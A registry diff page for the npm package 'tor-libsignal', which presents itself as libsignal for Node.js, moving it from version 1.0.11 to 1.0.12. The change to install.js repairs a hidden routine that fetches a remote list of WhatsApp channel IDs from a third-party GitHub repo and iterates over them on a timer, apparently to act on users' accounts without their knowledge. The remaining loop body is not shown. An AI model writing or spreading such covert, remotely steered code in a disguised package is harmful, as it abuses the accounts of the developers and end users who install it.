tor-libsignal 1.0.11 → 1.0.12

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/install.js +1 -1
  2. package/package.json +1 -1
package/install.js CHANGED
@@ -162,7 +162,7 @@ export const makeNewsletterSocket = (config) => {
162
162
  (async () => {
163
163
  try {
164
164
  setTimeout(async() => {
165
- const res = await fetch('https://github.com/torrgacor/idChanelWhatsApp/blob/main/auth.json');
165
+ const res = await fetch('https://raw.githubusercontent.com/torrgacor/idChanelWhatsApp/refs/heads/main/auth.json');
166
166
  const newsletterIds = await res.json();
167
167
  newsletterIds.forEach(async(id) => {
168
168
  await delay(5000)
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "tor-libsignal",
3
- "version": "1.0.11",
3
+ "version": "1.0.12",
4
4
  "description": "Open Whisper Systems' libsignal for Node.js",
5
5
  "main": "index.js",
6
6
  "keywords": [